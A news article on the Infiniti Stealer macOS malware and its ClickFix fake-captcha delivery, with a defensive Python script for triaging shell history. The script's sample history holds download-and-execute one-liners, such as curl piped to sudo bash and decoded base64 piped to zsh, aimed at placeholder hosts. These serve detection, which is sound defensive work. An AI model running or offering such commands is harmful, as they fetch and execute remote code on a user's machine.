A new malware strain, dubbed Infiniti Stealer, is infecting Mac computers by exploiting user behavior rather than traditional hacking methods. The attack, detailed in a recent Malwarebytes report, leverages a social engineering technique called “ClickFix” to bypass security defenses and steal sensitive data. This represents a shift in tactics, as attackers increasingly target Apple devices, exploiting the false assumption that they are less vulnerable.
How Infiniti Stealer Works: The ClickFix Method
The campaign begins with a phishing scheme or compromised webpage that presents a fake “Cloudflare human verification” captcha. Victims are prompted to complete a standard “I am not a robot” check, but also instructed to perform a “manual step”: opening the Terminal app on their Mac and pasting provided code.
“Because the user runs the command directly, many traditional defenses are bypassed. There’s no exploit, no malicious attachment, and no drive-by download.”
– Malwarebytes
This command delivers the Infiniti Stealer malware directly to the system. The fact that users willingly execute the malicious code makes detection significantly harder, as it avoids typical malware triggers.
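Because the delivery step is a command pasted into Terminal, it leaves a trace in the shell history. The following triage script is an added example, not code from the Malwarebytes report: it flags history entries that download or decode content and hand it straight to an interpreter. The rule patterns, the sample history and the `example.test` hosts are constructed assumptions, since the actual command is not reproduced on this page.

```python
import re

# zsh EXTENDED_HISTORY entries look like ": <epoch>:<elapsed>;<command>".
_ZSH_PREFIX = re.compile(r"^: (\d+):\d+;")
# Interpreters that execute whatever they are handed (assumed set).
_INTERP = r"(?:sudo\s+)?(?:(?:ba|z|da)?sh|osascript)\b"

# Heuristic traits of a pasted download-and-execute one-liner (assumptions).
RULES = {
    "download_piped_to_interpreter": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*" + _INTERP),
    "decoded_blob_piped_to_interpreter": re.compile(
        r"\bbase64\s+(?:-d|-D|--decode)\b[^|]*\|\s*" + _INTERP),
    "interpreter_runs_download": re.compile(
        r"\b" + _INTERP + r"""\s+-c\s+["']?\$\(\s*(?:curl|wget)\b"""),
}

def triage(history_text):
    """Return (line_no, epoch_or_None, command, [rule names]) per flagged entry."""
    findings = []
    for line_no, raw in enumerate(history_text.splitlines(), 1):
        m = _ZSH_PREFIX.match(raw)
        epoch = int(m.group(1)) if m else None   # None: plain history format
        cmd = (raw[m.end():] if m else raw).strip()
        hits = [name for name, rx in RULES.items() if rx.search(cmd)]
        if hits:
            findings.append((line_no, epoch, cmd, hits))
    return findings

# Constructed sample history, not taken from a real incident.
SAMPLE = """\
: 1700000000:0;brew update
: 1700000100:0;curl -s https://api.example.test/status | jq .
: 1700000200:0;/bin/bash -c "$(curl -fsSL https://verify.example.test/check)"
: 1700000300:0;echo Q09OU1RSVUNURUQ= | base64 -D | zsh
curl -fsSL https://verify.example.test/u.sh | sudo bash
"""

if __name__ == "__main__":
    for line_no, epoch, cmd, hits in triage(SAMPLE):
        print(f"line {line_no} (epoch={epoch}): {', '.join(hits)}\n    {cmd}")
```

Flagged entries are leads for review rather than verdicts: legitimate installers that use the same download-and-run pattern will match as well, so the timestamp and the source URL matter when deciding what to investigate.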
The Malware’s Capabilities and Technical Details
Infiniti Stealer is written in Python but compiled with Nuitka, which converts it into a native macOS binary. This makes analysis and detection far more complex. Once installed, the malware steals passwords, screenshots, browser data (including cookies), and other sensitive information, transmitting it to the attacker’s server.
This campaign is notable as the first documented case combining the ClickFix delivery method with a Nuitka-compiled Python stealer. The trend underscores a growing sophistication in how attackers target Macs, moving beyond simple exploits to more deceptive techniques.
Protecting Yourself From This Threat
Users should be extremely cautious when following instructions from unfamiliar websites. No legitimate captcha or verification process requires entering code into the Terminal app. If you are not comfortable with code, avoid any process that asks you to paste commands into Terminal.
If you suspect your Mac is infected, immediately stop using it. Change your passwords on a separate, clean device and revoke access from the compromised computer if possible.
The Broader Trend of Targeting Apple Devices
Infiniti Stealer is part of a wider trend of attackers increasingly targeting Apple devices. This shift is driven by the misconception that Macs are immune to malware. Other recent threats, like DarkSword targeting iPhones, demonstrate that iOS and macOS are just as vulnerable as other platforms when users are tricked into enabling malicious code.





























